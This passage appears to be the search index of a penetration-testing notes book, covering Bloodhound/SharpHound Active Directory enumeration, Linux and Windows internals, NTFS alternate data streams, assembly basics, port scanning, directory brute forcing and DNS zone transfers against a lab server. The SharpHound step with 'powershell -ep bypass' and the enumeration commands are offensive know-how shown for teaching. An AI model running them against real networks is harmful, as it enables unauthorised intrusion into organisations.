web interface. Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"232","title":"Overview"},"233":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"233","title":"Setup"},"234":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"234","title":"Collecting Data for Bloodhound"},"235":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"235","title":"Viewing the Data"},"236":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"236","title":"Finding Relationships in the Data"},"237":{"body":"","breadcrumbs":"System Internals","id":"237","title":"System Internals"},"238":{"body":"","breadcrumbs":"System Internals » Linux","id":"238","title":"System Internals"},"239":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"239","title":"User ID"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"240","title":"Unified File System"},"241":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"241","title":"Symbolic Links"},"242":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"242","title":"Hard Links"},"243":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible type of permissions - read (r), write (x) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"243","title":"Permissions"},"244":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"244","title":"Set Owner User ID (SUID)"},"245":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way SUID but rather than the files executing with the privileges of the owning user, they execute with the effective GID the owning group. When set on a directory, any file created within that directory will automatically have their group ownership set to one specified by the folder. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"245","title":"Set Group ID (SGID)"},"246":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"246","title":"Sticky Bit"},"247":{"body":"The command line, is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"247","title":"Introduction"},"248":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. > err_file Redirect the command's standard error into err_file by overwriting it. >> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"248","title":"Input and Output Redirection"},"249":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"249","title":"Pipes"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"","breadcrumbs":"System Internals » Windows","id":"250","title":"System Internals"},"251":{"body":"Active Directory (AD) is a directory service for Windows network environments. It allows an organisation to store directory data and make it available to the users in a given network. AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"251","title":"Introduction"},"252":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers . An object holding no other objects is known as a leaf .","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"252","title":"Objects"},"253":{"body":"Objects are organised in logical groups called domains . These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"253","title":"Object Organisation"},"254":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forwards slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"254","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"255":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"255","title":"Trusts"},"256":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"256","title":"Introduction"},"257":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"257","title":"System Internals"},"258":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. These objects are instances of the User class . User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"258","title":"Introduction"},"259":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"259","title":"Domain Users"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"260","title":"Introduction"},"261":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distributions groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"261","title":"Group Type"},"262":{"body":"There are three possible group scopes and once again must be selected upon creation of the group. The group scope determines the level of permissions that can be assigned via the group. Domain Local groups can only be used to manage permissions only regarding resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups allow access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and local groups. Universal groups allow permissions management across all domains within the same forest. They are stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replications, administrators are advised to keep users and computers in global groups which are themselves stored in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not part of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"262","title":"Group Scope"},"263":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes and cannot contain other groups - only users. Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"263","title":"Default Groups"},"264":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is update in the AD environment. These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. Relative ID (RID) Master Assignment of RIDs to other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, password changes, and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs between domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"264","title":"Introduction"},"265":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since full administrative access to a computer (NT AUTHORITY\\SYSTEM) grants privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"265","title":"Introduction"},"266":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another peculiar feature of NTFS are Alternate Data Streams .","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"266","title":"Introduction"},"267":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"267","title":"Permissions"},"268":{"body":"Permissions can be inspected from the command line by running icacls The last set of () for each user/group tell you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"268","title":"Inspecting Permissions"},"269":{"body":"A not very well-known, yet interesting feature of NTFS are the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer which makes them an easy way to hide data within legitimately looking files. Every file in NTFS has at least one default data stream where its data is stored. The default data stream is innominate and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"269","title":"Alternate Data Streams (ADS)"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster . The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exists, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from commmon URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command-line is needed. File operations with alternate data streams on the command-line work the same, but you will need to use the : format to refer to the stream you want to manipulate. For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"270","title":"Working with ADSs"},"271":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"271","title":"Reverse Engineering"},"272":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"272","title":"Program Anatomy"},"273":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each process has access to its own stack which isn't bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer diminishes , and when removing data, the stack pointer augments . This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"273","title":"The Stack"},"274":{"body":"When a function is invoked, a stack frame is constructed. First, the function's arguments which do not fit into the registers are pushed on the stack, then the return address is also pushed. Following this, the value of a special register known as the base pointer (rbp) is saved onto the stack and the value inside the register is then updated to point to the location on the stack where we saved the base pointer. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough in keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"274","title":"Stack Frames"},"275":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an opertation code (opcode) and optional data that the instruction operates with. These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"275","title":"Instructions"},"276":{"body":"Moves the value inside one register to another: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"276","title":"mov"},"277":{"body":"Load effective address - this instruction calculates the address of its second operand and moves it into its first operand: lea rdx, [rax+0x10] This will move rax+0x10 inside rdx.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"277","title":"lea"},"278":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"278","title":"add"},"279":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"279","title":"sub"},"28":{"body":"The BIND software is the most commonly used name server software, which supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. Use the following syntax for quering BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"It performs XOR-ing on its operands and stores the results into the first operand: xor rdx, rax The and and or are the same, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"280","title":"xor"},"281":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"281","title":"push"},"282":{"body":"Increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes and stores the popped value from the stack into its operand: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"282","title":"pop"},"283":{"body":"Jumps to the address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"283","title":"jmp"},"284":{"body":"Used for invoking procedures. It first pushes the values of the base and stack pointers onto the stack and then jumps to the specified address. After the function is finished, a ret instruction is issued which restores the values of the stack and base pointers from the stack and continues execution from where it left off.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"284","title":"call"},"285":{"body":"It compares the value of its two operands and sets the according flags depending on the result: cmp rax, rdx If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"285","title":"cmp"},"286":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"286","title":"jz / jnz"},"287":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to request and relieve any heap memory only once . Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to mark the area as available for use by the operating system and/or other programs. Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"287","title":"The Heap"},"288":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. -> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and read beyond bounds vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double delete vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"288","title":"Heap Rules"},"289":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"289","title":"The GLIBC Heap"},"29":{"body":"A Zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 